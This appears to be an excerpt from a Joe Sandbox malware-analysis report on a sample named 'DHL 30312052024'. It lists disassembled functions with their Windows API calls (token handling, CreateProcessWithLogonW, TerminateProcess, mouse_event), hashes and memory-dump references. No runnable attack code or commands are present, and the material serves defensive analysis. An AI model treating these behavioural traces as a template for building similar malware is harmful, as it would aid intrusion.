                                                                                        • Opcode ID: b163662683f8dff6c34fa0015e0f089336dfe92f374f09cc11412e1c31dbd12c
                                                                                        • Instruction ID: bba632586380b30169bc197303260906db96085bccb3a73244393d50ad14bcd4
                                                                                        • Opcode Fuzzy Hash: b163662683f8dff6c34fa0015e0f089336dfe92f374f09cc11412e1c31dbd12c
                                                                                        • Instruction Fuzzy Hash: 2F516D75A00209DFCB14CF58C884AAAB7B8FF8C310B15856EED59DB341E730E955CB94
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C62258
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C622A3
                                                                                        • IsMenu.USER32(00000000), ref: 00C622C3
                                                                                        • CreatePopupMenu.USER32 ref: 00C622F7
                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00C62355
                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C62386
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3311875123-0
                                                                                        • Opcode ID: e710f769b7522fe894b1b60e395b9704f1b3d9b3c2002162c8068cbf75edde4f
                                                                                        • Instruction ID: 1909e24e5b4c576921be31cdb62c382260c7a1efe24dbfbb64c90884eb6132a1
                                                                                        • Opcode Fuzzy Hash: e710f769b7522fe894b1b60e395b9704f1b3d9b3c2002162c8068cbf75edde4f
                                                                                        • Instruction Fuzzy Hash: FF518C70A00A4AEBDF31CF68D8C8BADBBF9BF45314F104139E861A72A0D7749A45CB51
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C0179A
                                                                                        • GetWindowRect.USER32(?,?), ref: 00C017FE
                                                                                        • ScreenToClient.USER32(?,?), ref: 00C0181B
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C0182C
                                                                                        • EndPaint.USER32(?,?), ref: 00C01876
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                        • String ID:
                                                                                        • API String ID: 1827037458-0
                                                                                        • Opcode ID: 1b4a4331b3266b4aceeca3d1c90aa6fb9e9059b59db4a2b0bd13e3d8f02859de
                                                                                        • Instruction ID: 22ca8b66812da4ea62d7cd7e2d4758bdbe30fc5976484e1968b82fe79d28ea41
                                                                                        • Opcode Fuzzy Hash: 1b4a4331b3266b4aceeca3d1c90aa6fb9e9059b59db4a2b0bd13e3d8f02859de
                                                                                        • Instruction Fuzzy Hash: 40417E71504700AFD710DF25CC88FAABBE8EB46724F18466DFAA4871E1D730AD45DB62
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00C74E41,?,?,00000000,00000001), ref: 00C770AC
                                                                                          • Part of subcall function 00C739A0: GetWindowRect.USER32(?,?), ref: 00C739B3
                                                                                        • GetDesktopWindow.USER32 ref: 00C770D6
                                                                                        • GetWindowRect.USER32(00000000), ref: 00C770DD
                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C7710F
                                                                                          • Part of subcall function 00C65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C652BC
                                                                                        • GetCursorPos.USER32(?), ref: 00C7713B
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C77199
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4137160315-0
                                                                                        • Opcode ID: b8da42b20358c237658dfe2b67f52b02b53e86b44a6981e065fc8f1a767870d2
                                                                                        • Instruction ID: 4c91ae6a9418aa8018b9ecc96511ce42199e8f0ca1c48cbdbff26b04f187ff74
                                                                                        • Opcode Fuzzy Hash: b8da42b20358c237658dfe2b67f52b02b53e86b44a6981e065fc8f1a767870d2
                                                                                        • Instruction Fuzzy Hash: 6231D272609309ABD720DF14D849B9FB7A9FF88314F004A19F59997191CB70EA09CB96
                                                                                        APIs
                                                                                          • Part of subcall function 00C580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C580C0
                                                                                          • Part of subcall function 00C580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C580CA
                                                                                          • Part of subcall function 00C580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C580D9
                                                                                          • Part of subcall function 00C580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C580E0
                                                                                          • Part of subcall function 00C580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C580F6
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00C5842F), ref: 00C588CA
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C588D6
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C588DD
                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C588F6
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00C5842F), ref: 00C5890A
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00C58911
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 3008561057-0
                                                                                        • Opcode ID: b194e6d45d0bc99fa42bd817d5f7db1de52da46d271e7ce9e6db4f6ba2722396
                                                                                        • Instruction ID: e4bb3becf4987b075a0a5a69f6f144f634f2eba2aa14bc9bfc6e32ef9649a7ec
                                                                                        • Opcode Fuzzy Hash: b194e6d45d0bc99fa42bd817d5f7db1de52da46d271e7ce9e6db4f6ba2722396
                                                                                        • Instruction Fuzzy Hash: B411B135501209FFDB109FA4DC09BBEB768EB45316F10402DE895E7210CB32AE99DB68
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C585E2
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00C585E9
                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C585F8
                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00C58603
                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C58632
                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C58646
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                        • String ID:
                                                                                        • API String ID: 1413079979-0
                                                                                        • Opcode ID: efbbe600e943e01f5d350a06a6450e4762cbf1470dfd26f8a8332b2e89a0b22c
                                                                                        • Instruction ID: 13f06bfcb1639a60b98a4d8717a440951771c94268f69954478344d0bbb81f5e
                                                                                        • Opcode Fuzzy Hash: efbbe600e943e01f5d350a06a6450e4762cbf1470dfd26f8a8332b2e89a0b22c
                                                                                        • Instruction Fuzzy Hash: 7011607650120DAFEF018F94DD49FDE7BA9EF08305F144069FE04A2160C7718E69EB64
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00C5B7B5
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C5B7C6
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C5B7CD
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00C5B7D5
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C5B7EC
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00C5B7FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: 53b8764b89d2abf361fe7c04d60896928273f0ac95e7063be80fcaa463303ce6
                                                                                        • Instruction ID: 7013edaf019d3c23c1940bdd8acaa755e2a654b1da6e607ac53f33a7afc90def
                                                                                        • Opcode Fuzzy Hash: 53b8764b89d2abf361fe7c04d60896928273f0ac95e7063be80fcaa463303ce6
                                                                                        • Instruction Fuzzy Hash: 48018475E00219BBEF109BA69C49B5EBFB8EB48351F004179FE04E7291D6309D11CFA4
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C20193
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C2019B
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C201A6
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C201B1
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C201B9
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C201C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: e169784b425b62d3aac8fff735cf1554d19494c8f5ba148e6fee85817daebeae
                                                                                        • Instruction ID: 92be4889615a0c5852d6e1c5de77df5e5cb7b238164ee3e0da1cef600e38fdea
                                                                                        • Opcode Fuzzy Hash: e169784b425b62d3aac8fff735cf1554d19494c8f5ba148e6fee85817daebeae
                                                                                        • Instruction Fuzzy Hash: DC0148B09017597DE3008F5A8C85B56FEA8FF19354F00411BA15887941C7B5A864CBE5
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C653F9
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C6540F
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00C6541E
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C6542D
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C65437
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C6543E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        • Opcode ID: 7cd32d0becbce412e98e57e7a758f9ad9260362c68abe54a7a8e5a7640c401a5
                                                                                        • Instruction ID: ed5b093c5dc42cc844ba78eb84c8104da791f350c09d81f8ba15b0dae73dc2a2
                                                                                        • Opcode Fuzzy Hash: 7cd32d0becbce412e98e57e7a758f9ad9260362c68abe54a7a8e5a7640c401a5
                                                                                        • Instruction Fuzzy Hash: C8F01231241558BBD7215B929C0DFAF7A7CEFC6B11F00016DF904D1051E6A51A1287B9
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00C67243
                                                                                        • EnterCriticalSection.KERNEL32(?,?,00C10EE4,?,?), ref: 00C67254
                                                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00C10EE4,?,?), ref: 00C67261
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C10EE4,?,?), ref: 00C6726E
                                                                                          • Part of subcall function 00C66C35: CloseHandle.KERNEL32(00000000,?,00C6727B,?,00C10EE4,?,?), ref: 00C66C3F
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C67281
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00C10EE4,?,?), ref: 00C67288
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        • Opcode ID: ed68abd11e8e403a2e53b182c66691ca291c15ce67a508628281f1e89eb87549
                                                                                        • Instruction ID: 9b79993fb3940389bcaeda7d3578175eeee224dafaf4ca032155d8188880b809
                                                                                        • Opcode Fuzzy Hash: ed68abd11e8e403a2e53b182c66691ca291c15ce67a508628281f1e89eb87549
                                                                                        • Instruction Fuzzy Hash: 8FF08236540612EBD7211B64ED8CBDF7739FF45702B100639F603A10A1DB7A5912CB54
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C5899D
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00C589A9
                                                                                        • CloseHandle.KERNEL32(?), ref: 00C589B2
                                                                                        • CloseHandle.KERNEL32(?), ref: 00C589BA
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C589C3
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00C589CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: 47805a473d19e0d6ef8e602914abde5dcf9c51d76479669ff8966897a87397ca
                                                                                        • Instruction ID: ac0867311a33a02ddec9ed25de5c70f0e0e531b0d8c16ee54be4852f46af3560
                                                                                        • Opcode Fuzzy Hash: 47805a473d19e0d6ef8e602914abde5dcf9c51d76479669ff8966897a87397ca
                                                                                        • Instruction Fuzzy Hash: 66E05276104505FBDA021FE5EC0CB5EBB69FB89762B508639F219C1474CB329462DB58
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00C78613
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00C78722
                                                                                        • VariantClear.OLEAUT32(?), ref: 00C7889A
                                                                                          • Part of subcall function 00C67562: VariantInit.OLEAUT32(00000000), ref: 00C675A2
                                                                                          • Part of subcall function 00C67562: VariantCopy.OLEAUT32(00000000,?), ref: 00C675AB
                                                                                          • Part of subcall function 00C67562: VariantClear.OLEAUT32(00000000), ref: 00C675B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4237274167-1221869570
                                                                                        • Opcode ID: 5142be04ed65b8404164126019b0dc6ad95351c69da6ed20fb92a4a42849246c
                                                                                        • Instruction ID: 1c4718adb925f0e0e004ddf16d3ca7afe960204b157ad5f5f088d93e6e241a67
                                                                                        • Opcode Fuzzy Hash: 5142be04ed65b8404164126019b0dc6ad95351c69da6ed20fb92a4a42849246c
                                                                                        • Instruction Fuzzy Hash: 68918074608301DFCB10DF25C48495BBBE4EF89714F14896EF99A8B3A2DB31E949CB52
                                                                                        APIs
                                                                                          • Part of subcall function 00C1FC86: _wcscpy.LIBCMT ref: 00C1FCA9
                                                                                        • _memset.LIBCMT ref: 00C62B87
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C62BB6
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C62C69
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C62C97
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 4152858687-4108050209
                                                                                        • Opcode ID: 31bf825962d23c06d82d000c10df0cc0a59f705e8618618f4587bab6c4d6b59a
                                                                                        • Instruction ID: a5cf98bfe8d336b13cf301c573381725cccbe7aed1b9870c30ff1facf3fea29c
                                                                                        • Opcode Fuzzy Hash: 31bf825962d23c06d82d000c10df0cc0a59f705e8618618f4587bab6c4d6b59a
                                                                                        • Instruction Fuzzy Hash: 1451CE71608B01AFE7349E28D885A6FB7E8EF95350F040A2DF8A1D6191DB70DE44E752
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(013BFD88,?), ref: 00C89863
                                                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00C89896
                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C89903
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3880355969-2594219639
                                                                                        • Opcode ID: ae0aa8ed366ccba3101f53bd1e3cb5e61741889ea347a4cbfe8701ec3161095d
                                                                                        • Instruction ID: 000628c5cc03e9329ebe9b08bebe86fb0ad46e269ac020aefebdaa1a10b923c9
                                                                                        • Opcode Fuzzy Hash: ae0aa8ed366ccba3101f53bd1e3cb5e61741889ea347a4cbfe8701ec3161095d
                                                                                        • Instruction Fuzzy Hash: BB512E74A00209AFCF10DF54D884ABE7BB5FF56364F14825DF8659B2A0D731AE81CB94
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C59AD2
                                                                                        • __itow.LIBCMT ref: 00C59B03
                                                                                          • Part of subcall function 00C59D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C59DBE
                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C59B6C
                                                                                        • __itow.LIBCMT ref: 00C59BC3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3379773720-2594219639
                                                                                        • Opcode ID: 907f85a98e2b66bf82b3fd9dfdac6e096904857466a308aa0aa3c86c8ffc541c
                                                                                        • Instruction ID: 14882f9cd4f54db734b9b211ab4c84af39d9b52576bc9fb7e4951be14d043d9e
                                                                                        • Opcode Fuzzy Hash: 907f85a98e2b66bf82b3fd9dfdac6e096904857466a308aa0aa3c86c8ffc541c
                                                                                        • Instruction Fuzzy Hash: C941D274A00208EBEF25EF10D845BEE7BB9EF44711F0000A9FD15A3291DB70AE89DB65
                                                                                        APIs
